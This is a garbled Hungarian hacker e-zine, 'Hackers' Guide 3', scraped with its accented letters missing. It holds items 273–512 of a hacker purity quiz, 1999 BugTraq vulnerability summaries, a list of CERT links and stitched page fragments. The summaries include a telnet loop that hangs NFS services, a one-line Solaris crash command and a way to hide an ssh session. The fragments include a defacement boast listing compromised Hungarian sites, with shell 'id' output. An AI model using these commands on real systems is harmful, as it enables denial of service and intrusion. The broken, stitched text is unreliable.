273....frekvenciamrt? 274....logikai szintjelzt? 275....wirewrap pisztolyt? 276....forraszt pkt? 277....logikai analiztort? 278.Terveztl mr LSI chipet? 279....le is gyrtottk? 280....mkdtt is? 281.Marattl mr nyomtatott ramkrt? TRTNELEM 282.Vittl mr be boot kdot a mrnki pultrl? 283....a memribl? 284.tudsz Eniac-ot programozni? 285.Lttl mr 90 oszlopos lyukkrtyt? 286.Szoktl IBM termkazonost szmokkal lmodni? 287.Tudod mit jelent az IBM 7320154 azonost szma? 288.Megrted az 3270 adatformtumot? 289.Sikerlt mr mgneslemezrl felbootolnod egy IBM gpet? PROGRAMOZSI NYELVEK 290.Tbb mint ngy programozsi nyelvet ismersz? 291.... tbb mint nyolcat? 292.... tizenhatot? 293.... harmickettt? 294.Terveztl mr programozsi nyelvet? 295.Tudod mit jelent a Basic? 296.... Pascal? 297.Tudsz Basicben programozni? 298....msok eltt is beismered? 299.Tudsz Cobolban programozni? 300....Elvbl nem programozol Cobolban? 301.Ismered a Pascalt? 302.... Modula-2? 303.... Oberon? 304.... Kettnl tbb Wirth ltal kitallt nyelvet? 305....tudod idzni Nicklaus Wirth valamelyik aforizmjt? 306.Ismered az Algol-60-t? 307.... Algol-W? 308.... Algol-68? 309.... Megrtesz egy Algol-68 hibalistt? 310.Szereted a ktszint szintaktikai ellenrzst? 311.Tudsz gpi kdban programozni legalbb kt klnfle processzort? 312.... ngy klnfle processzort? 313.... nyolc klnfle processzort? Ismered az albbi nyelvek valamelyikt?
113
Hackers Guide
314.... APL? 315.... Ada? 316.... BCPL? 317.... C++? 318.... C? 319.... Comal? 320.... Eiffel? 321.... Forth? 322.... Fortran? 323.... Hypertalk? 324.... Icon? 325.... Lisp? 326.... Logo? 327.... MIIS? 328.... MUMPS? 329.... PL/I? 330.... Pilot? 331.... Plato? 332.... Prolog? 333.... RPG? 334.... Rexx (or ARexx)? 335.... SETL? 336.... Smalltalk? 337.... Snobol? 338.... Occam 339.... SQL? 340.... brmilyen assembly nyelvet? 341.Beszlsz VT-100-ul? 342.... Postscriptl? 343.... SMTP-l? 344.... UUCP-ul? 345.... angolul? MIKROSZMITOGPEK 346.Msoltl mr msolsvdett lemezt? 347.Dolgoztl mr ki msolsvdelmi mdszert? 348.Ksztettl mr nem szabvnyosan formzott mgneslemezt? 349.lltottl mr vissza adatokat megsrlt lemezrl? 350.Bootoltl mr csupasz lemezrl? HLZATOK 351.Elfordult mr, hogy egyszerre kt kln idznban lv gpre is be voltl jelentkezve? 352.Tudod fejbl az orszgod gerinchlzatnak trkpt? 353....mindegyik orszgt? 354.Talltl mr hibt a sendmail programban? 355.... Az adatok titkossgt rint hiba volt? 356.Tudod fejbl a gpetek HOSTS.TXT tblzatt?
114
Hackers Guide
357....a legutbbi vltozatot is? 358.Fel tudod sorolni valamennyi top-level nameservert a cmkkel egytt? 359.Tudod fejbl RFC-822 szabvnyt? 360....fel tudod sorolni az sszes hibjt? 361.Irtl mr sendmail konfigurcis fjt? 362....mkdtt? 363....egy ht mlva is rtetted a konfig fjlt? 364.Tudod, hogy mennyi egy csomag maximlis lettartama? 365.Fel tudod sorolni az ISO/OSI szabvny 7 rtegt? 366....rted, hogy mire val a fels kt rteg? OPERCIOS RENDSZEREK Ismered-e ezeket az opercis rendszereket: 367.... BSD Unix? 368.... nem-BSD Unix? 369.... AIX 370.... Linux 371.... VM/CMS? 372.... VMS? 373.... MVS? 374.... VSE? 375.... RSTS/E? 376.... CP/M? 377.... COS? 378.... NOS? 379.... CP-67? 380.... RT-11? 381.... MS-DOS? 382.... Finder? 383.... PRODOS? 384.... A TRS-80 gpre rt opercis rendszerek kzl tbb mint egyet? 385.... Tops-10? 386.... Tops-20? 387.... OS-9? 388.... OS/2? 389.... AOS/VS? 390.... Multics? 391.... ITS? 392.... Vulcan? 393.Csinltl mr swap partcit szalagos egysgre? 394....szalag lyukasztra? 395....konzolrgpre? 396....hlzati meghajtra? 397.Talltl mr programozi hibt valamilyen opercis rendszerben? 398.... visszltl vele? 399.... jelentetted? 400.... Figyelmen kvl hagytk a jelentsedet? 401.Tettl mr tnkre szmtgpet?
115
Hackers Guide
402.... szndkosan? EMBEREK 403.Ismersz embereket? 404....egynl tbbet? 405....kettnl tbbet? SZEMLYES KRDSEK 406.Ki van ktdve a cipfzd? 407.Jl tudsz idegenekkel kommuniklni? 408.Tudod-e fejbl tbb mint hat BBS telefonszmt, mikzben a sajt otthoni szmodra nem emlkszel? 409.Be szoktl login-olni reggeli eltt? 410.Napi tven cssznl tbb vt iszol? 411.Szoktl "igen"-nel vlaszolni a "vagy-vagy" krdsekre? 412.Van a birtokodban valamelyik opercis rendszer kziknyvnek legfrissebb kiadsa? 413.... mindegyik opercis rendszer...? 414.Vannak-e problmi msoknak, mikor a te sajt magadnak kialaktott Windows krnyezetedben dolgoznak? 415.Szoktl valamilyen programozsi nyelven lmodni? 416.Vannak nehzsgeid, mikor hromdimenzis objektumokra kell figyelned? 417.Gylld az egeret? 418.Undorodsz a CAPS LOCK billentytl? 419.Bzol az ttermek menjben? 420.Lg-e Mandelbrot rajz a szobd faln? 421.Dsztetted-e valaha a szobd falt mgnesszalaggal vagy lyukkrtyval? 422.Lg-e felakasztva kibelezett lemeztok vagy csupasz mgneslemez a szobdban? 423.Lttad mr a valaha a napfelkeltt? 424....dupln? 425.Hasznlod az "forward" szt a htkznapi beszlgetsekben? (Pl: "Lgy szves forwardold ide a startt!") 426....a "mountolni" szt? 427.Hasznlod a P kdot? 428.Automatikusan RTFM-el vlaszolsz-e a hozzd intzett krdsekre? 429....tudod, hogy az RTFM minek a rvidtse? 430.Tudod-e, hogy mi a klnbsg a "garbage collection" s a "memory management" kztt? 431.Vannak-e hehzsgeid, ha vzszintes helyet akarsz tallni a szobdban? 432.Szoktl-e tudomnyos folyiratokat olvasni loklokban, hogy gy hvd fel magadra a nk figyelmt? 433.Van-e szmtstechnikra utal jel (matrica, rajz, emblma, stb.) a tskdon? 434.Voltl mr hazugsgvizsglaton?
116
Hackers Guide
435.Voltl-e mr egyfolytban 48 rt tvol a szmtgpedtl? 436.Egyeztettl mr tallkozt szmtgpen keresztl? 437.Szoktl-e szmtgpen keresztl beszlgetni a melletted lv gpnl lvel? 438....egyszerre tbbel is? 439.Talk-oltl mr tbb mint egy rn keresztl? 440....tbb mint kett...? 441....tbb mint nyolc...? 442....tbb mint huszonngy...? 443.Szoktl IRC-zni? 444.Anyztl mr valakit IRC-ben? 445....rendszeresen szoktl anyzni? PROGRAMOZS 446.Tudsz FORTRAN fordtt rni? 447.... A DOS EDLIN-jvel is? 448.Tudsz hexa dumpot olvasni? 449...fejben disassembllni? Irtl-e mr valaha... 450....fordtt? 451....opercis rendszert? 452.... device drivert? 453.... szvegszerkesztt? 454.... kpernybra leszedt? 455.... adatbzis-kezelt? 456.... szakrti rendszert? 457.... lfelismert? 458.... vals idej szablyozrendszert? 459.... folyszmla nyilvntartt? 460.... vrust? 461.... vrusirtt? 462.Irtl mr bioritmus vagy horoszkp programot? 463....eladtad-e a ksztett elrejelzseket? 464....az eredmnyeket vletlenszm genertorral csinltad? 465.Kiszmtottad-e mr a p rtkt 1000 tizedesnl pontosabban? 466.... e rtkt? 467.Talltl-e mr 1000 jegynl hosszabb prmszmot? 468.Irtl mr nmdost kdot? 469....bszke vagy r? 470.Irtl-e mr olyan programot, ami elsre futott? 471....s hosszabb volt, mint hsz sor? 472....szz sor? 473....assemblyben rtad? 474....msodjra is mkdtt? 475.Meg tudod oldani a Hanoi Tornyai problmt rekurzv mdon? 476....nem rekurzvan? 477.... a troff szvegformz segtsgvel? 478.Kldtl mr plyamunkt a "Ki tud elvetemltebb C kdot rni" versenybe?
117
Hackers Guide
479....nyertl? 480.... megvltoztattk-e a szablyokat a plyamunkd miatt? 481.Prbltad mr megrteni egy t vvel ezeltt rt programodat? 482....sikerlt? 483.Tltttl-e mr el tz percnl tbbet egy egyszer gpelsi hiba megtallsval? 484....egy rnl tbbet? 485....egy napnl tbbet? 486....egy htnl tbbet? 487....az els ember, akinek megmutattad a programodat, azonnal megtallta-e a hibt? UNIX 488.Tudod hasznlni a Berkeley Unixot? 489....a nem Berkeley Unixot? 490.Tudod mi a klnbsg a Unix dokumentci negyedik s tdik fejezete kztt? 491.Meg tudod tallni TERMIO lerst a System V release 2 dokumentcijban? 492.Mountoltl mr valaha mgnesszalagot Unix filesystemknt? 493.Lefordtottad valaha a Minix-et? 494.Installltl mr Linuxot? 495....elsre sikerlt? USENET 496.Hasznlod az Internet "news" szolgltatst? 497.... Tbb mint 32 newsgroupot olvasol? 498.... Tbb mint 256...? 499.... mindet...? 500.Kldtl mr be cikket levelezlistra? 501....rendszeresen kldesz be cikkeket? 502.Megrzd a bekldtt cikkeidet? 503.Bekapcsoldtl valaha valakinek a cikizsbe? 504.Indtottl mr valaha cikiz kampnyt valaki ellen? 505....cikiztl ki cikiz levelet? 506....rendszeresen szoktl cikiz leveleket rni? 507.Kldted mr be sajt programodat valamilyen programozi levelezlistra? 508.Hamistottl mr levelet? 509...tudod hogy kell? 510.Csinltl mr sajt levelezlistt? 511....mg most is ltezik? 512....olvassa valaki rajtad kvl? URL of this page: http://esca.atomki.hu/dlug/kikapcs/hacker.html last modification: Tuesday, 01-Jul-1997 01:00:00 CEST Page maintained by Istvan Cserny Cliquee
118
Hackers Guide
************************************************************************************************
BugTraq lista rszletek...
forrs: BUGTRAQ (1999.04.19) felad: Chris Wedgwood (chris@CYBERNET.CO.NZ) SSH problma (?) Ha az "ssh -lgreg localhost /bin/bash" mdon hvunk shell-t a gpen, a jelenltnk nem fog ltszani. Azaz, pl. egy "who" parancs nem mutatja meg az gy dolgoz tmadt, de az ssh logolja a kapcsolatot.
forrs: BUGTRAQ (1999.04.15) felad: Peter van Dijk (peter@ATTIC.VUURWERK.NL) Tovbbi rpc DoS problmk Az UDP alap szolgltatsok mkdse az elzekben lertaknl knnyebben is felfggeszthet a kvetkez mdon: [root@koek] ~# ( while true ; do echo ; sleep 5 ; done ) | telnet zopie 2049 Trying 10.10.13.1... Connected to zopie.attic.vuurwerk.nl. Escape character is '^]'. NFS server zopie not responding, still trying. Connection closed by foreign host. Azaz egyszeren telnetelni kell a szolgltats portjra s 5 msodpernyi szemetet kldeni. Amg a szemt kldst nem szaktjuk meg, a szolgltats nem hasznlhat.
forrs: BUGTRAQ (1999.03.18) felad: matthew green (mrg@ETERNA.COM.AU) A noexec flag hibs kezelse NetBSD-n rintett verzik: NetBSD 1.3.3 s a korbbi verzik, NetBSD-current 19990318-ig Mivel a mount rendszerhvs nem ignyel privilgiumokat, gy egy mezei user is tud mountolni, ha clknyvtr usere sajt maga s a clhoz van olvassi joga. A mountolt filerendszerre mr nem lesz rvnyes a 'noexec' flag, annak ellenre, hogy a clknyvtr filerendszere azzal lett mountolva. Patch: ftp://ftp.NetBSD.ORG/pub/NetBSD/misc/security/patches/19990317-mount A patch a mount rendszerhvst mdostja, gy a mountolt filerendszer rkli a 'noexec' flag-et.
119
Hackers Guide
forrs: BUGTRAQ (1999.03.10) felad: Toomas Soome (tsoome@UT.EE) procfs hiba a 64 bites Solaris 7-ben A hiba lehetv teszi, hogy a mezei userek egy 'more /proc/self/psinfo' paranccsal lecrasheljk a gpet. Tesztelve UE3000-en, U10-en s UE450-en. forrs: BUGTRAQ (1999.03.10) felad: Security Research Labs (seclabs@NAI.COM) Spoof-olhat Linux TCP kapcsolatok Egy implementcis hiba a 2.0.35-s s kisebb verzij kernelekben lehetv teszi, hogy a tmad a TCP sequence number kitallsa nlkl, a kapcsolat ltrejtte eltt adatokat kldjn a alkalmazsi rtegnek. Bvebben: A Linux csak az acknowledgement number-t ellenrzi, ha az rkez csomagokban az ACK flag be van lltva. A nyugtzsi informcik nlkli TCP csomagok tartalma is queue-ba kerl a kapcsolat ltrejtte eltt, az els SYN szerver ltal val nyugtzsa utn. Ha ezutn a rendszer kap egy csomagot, amelyikben a FIN flag be van lltva, a kapcsolat ltrejtttl fggetlenl tadja az adatokat az alkalmazsi rtegnek. A szabvny szerint csak a kapcsolatkr SYN csomag esetben fogadhat el adat, ha az ACK flag nincs belltva. A rendszernek minden ms esetben el kellene dobnia az ACK flag nlkli csomagokat. Ha egy TCP csomagban be van lltva az ACK flag, akkor az acknowledgement number-nek (a kvetkez adatbyte sorszma, amit a msik fltl vrunk) is korrektnek kell lennie. sszefoglalva: A hibs Linux kernelek elfogadjk az ACK nlkli csomagokat is. Mivel a csomagban nincs ACK, az acknowledgement sequence number nem lesz ellenrizve. Ez lehetv teszi, hogy a tmad csomagokat kldjn egy spoof-olt kapcsolaton keresztl, anlkl, hogy elre tudn a clpont kapcsolat kezdeti vagy aktulis sequence number-t. A Linux nem tovbbtja az adatokat, ha a kapcsolat SYN_RECEIVE llapotban van. Ezrt a tmad csak akkor tudja sikeresen spoof-olni a TCP forgalmat, ha vgigcsinlja a TCP handshake-et. Csakhogy egy implementcis hiba nhny Linux kernelben lehetv teszi, hogy a tmad teljesen elhagyja a TCP handshake-et, ha egy id eltti FIN csomaggal lezrja a kapcsolatot. Amikor a FIN csomag tovbbtdott egy SYN_RECEIVE llapot kapcsolatnak, a Linux gy gondolja, hogy a kapcsolat ESTABLISHED llapot volt s a kapcsolat CLOSE_WAIT llapotba kerl. Ebben az llapotban a kapcsolat queue-ban lv adatai tovbbtdnak az alkalmazsnak. Ha a FIN csomagban az ACK flag nem volt belltva, a cl sequence number-t a rendszer nem ellenrzi. Ma dlutn mr az exploit kdot is megrtk, szval upgrade!. Megolds: kernel upgrade legalbb 2.0.36-ra.
120
Hackers Guide
************************************************************************************************
Hasznos URL-ek gyjtemnye a szmtgpes biztonsg terletn:
A legteljesebb s a legtbb dologra kiterjed lista, amit a hln tallni lehet: Spaf's MEGA hotlist COAST Hotlist Computer Security, Law & Privacy http://www.cs.purdue.edu/homes/spaf/hotlist/csec.html
FIRST (Forum of Incident Response and Security Teams) http://www.first.org A "FIRST" sszefoglalja az sszes olyan csoportosulst, amely a szmtgpes biztonsg terletn dolgozik, s a nem kvnt esemnyek elhrtsban, illetve megelzsben vesz rszt.
Computer Emergency Response Teams - az cenon tl
AUSCERT (Australian Computer Emergency Response Team) http://auscert.org.edu Az ausztrl csoport, amely helyileg segt a sikeres tmadsok kivdsben. Igen kivl szmtgpes biztonsggal foglalkoz dokumentumokat tart a Webszervern.
CERT (CERT Cordination Center) http://www.cert.org
PCERT http://www.cs.purdue.edu/pcert/pcert.html A Purdue University oktatibl s dolgozib alakult csoport.
121
Hackers Guide
CIAC (U.S. Department of Energy) http://ciac.llnl.gov AFCERT (U.S. Air Force Cert) http://www.afcert.kelly.af.mil
Computer Emergency Response Teams - Eurpa
Hollandia CERT-NL (SURFnet Computer Emergency Response Team) http://www.nic.surfnet.nl/surfnet/cert-nl.html
Nmetorszg DFN-CERT http://www.cert.dfn.de/ http://www.cert.dfn.de/eng
BSI-CERT http://www.cert.dfn.de/eng/csir/europe/bsicert.html
Horvtorszg CARNet CERT http://www.mzt.hr/~gaus/hrvert.html
Dnia, Finnorszg, Grnland, Norvgia, Svdorszg NORDUnet-CERT http://www.nordu.net/cert
122
Hackers Guide
Franciaorszg RENATER http://web.ucer.fr/Renater/sec/certrenater.html Olaszorszg CERT-IT http://idea.sec.dsi.unimi.it/cert-it.html
Lengyelorszg CERT-NASK http://www.nask.pl/NASK/CERT/ang.html
Svjc SWITCH-CERT http://www.switch.ch/switch/cert/SWITCH-CERT.html
Svjc SWITCH-CERT http://www.switch.ch/switch/cert/SWITCH-CERT.html
Spanyolorszg IRIS-CERT http://www.rediris.es/cert/contact.html
Nagy-Britannia JANET-CERT http://www.ja.net/CERT/JANET-CERT/JANET-CERT_Contact_info.html
FOLYT. KV.
123
Hackers Guide
Ezek a linkek a VDD MAGAD AZ INTERNETEN cm knyv fggelkbl valak. gy gondolom, hogy ez is hasznos lehet az eredmnyes hackelshez.
- NetHyena
End of Volume #3
124

Hackers&#39; Guide 3

Uploaded by

Document Information

Copyright

Available Formats

Share this document

Share or Embed Document

Sharing Options

Did you find this document useful?

Is this content inappropriate?

Copyright:

Available Formats

Hackers&#39; Guide 3

Uploaded by

Copyright:

Available Formats

Hackers Guide

OpenBSD felhasznli tmutat

Ms UN*X-on: dd if=floppy26.fs of=/dev/fd0 bs=32k

DOS, Win3x, Win9x alatt: rawrite.exe NT alatt: ntrw.exe

Klnbz trjai programfajtk lersa

me$$iah trojai program

Egy kis elzmny:

RSC's Offline Server Emulator

-=R|S|C=- rsctm@freemail.hu 'lamerz can fuck off...'

Technical University of Budapest Schonherz Zoltan Dormitory /-------------------------------3OO---->>.Info

CD-k msolsvdelmnek megszntetse Felhasznlt dokumentum: "Hack-FAQ <Volume 5>" /Wang/

This Site owned by :

bash-2.03$ id uid=33(www-data) gid=1001(uzlethaz) groups=1001(uzlethaz)

afilmsite.com agility.hu amstel canderel.hu bignet autolista.hu geodezia.hu goldfish

e-contact.hu e-start.hu foldnapja.hu gandi.hu gfk-dorel-ipms.hu

loyolacollege.org pityer.hu planetclub.org portar.hu szinyei.hu

tundehullareszegen.hu tutynet.com webkom.hu windrivers.hu

posterprint.hu trax.hu plakatgyar.hu profitinfo.hu uzlethaz.com poster-display.net regiszterplakat.hu

Na legyetek jok, mi meg csak figyelunk titeket - Haxor Nation Crew -

Nyugatmagyarorszgi Egyetem feltrse

Orszgos Szchenyi Knyvtr feltrse

E-Plus Talkline Debitel IC 3S Dr Materna Panafon Telestat OTE Hellas

Holland Hong Kong Hungary

Iceland Indonesia Ireland Italy

Latvia Lebanon Lithuania Luxembourg Malaysia

New Zealand Norway

Era GSM Polkomtel

Portugal Russia Singapore

Slovakia South Africa

Switzerland Thailand The Philipines Turkey United Kingdom

40423 40426 50505 50766 53001 61466 65000

BugTraq lista rszletek...

Hasznos URL-ek gyjtemnye a szmtgpes biztonsg terletn:

Computer Emergency Response Teams - az cenon tl

CERT (CERT Cordination Center) http://www.cert.org

PCERT http://www.cs.purdue.edu/pcert/pcert.html A Purdue University oktatibl s dolgozib alakult csoport.

Computer Emergency Response Teams - Eurpa

Hollandia CERT-NL (SURFnet Computer Emergency Response Team) http://www.nic.surfnet.nl/surfnet/cert-nl.html

Nmetorszg DFN-CERT http://www.cert.dfn.de/ http://www.cert.dfn.de/eng

Horvtorszg CARNet CERT http://www.mzt.hr/~gaus/hrvert.html

Dnia, Finnorszg, Grnland, Norvgia, Svdorszg NORDUnet-CERT http://www.nordu.net/cert

Franciaorszg RENATER http://web.ucer.fr/Renater/sec/certrenater.html Olaszorszg CERT-IT http://idea.sec.dsi.unimi.it/cert-it.html

Lengyelorszg CERT-NASK http://www.nask.pl/NASK/CERT/ang.html

Svjc SWITCH-CERT http://www.switch.ch/switch/cert/SWITCH-CERT.html

Svjc SWITCH-CERT http://www.switch.ch/switch/cert/SWITCH-CERT.html

Spanyolorszg IRIS-CERT http://www.rediris.es/cert/contact.html

Nagy-Britannia JANET-CERT http://www.ja.net/CERT/JANET-CERT/JANET-CERT_Contact_info.html

You might also like

Hackers' Guide 3

Hackers' Guide 3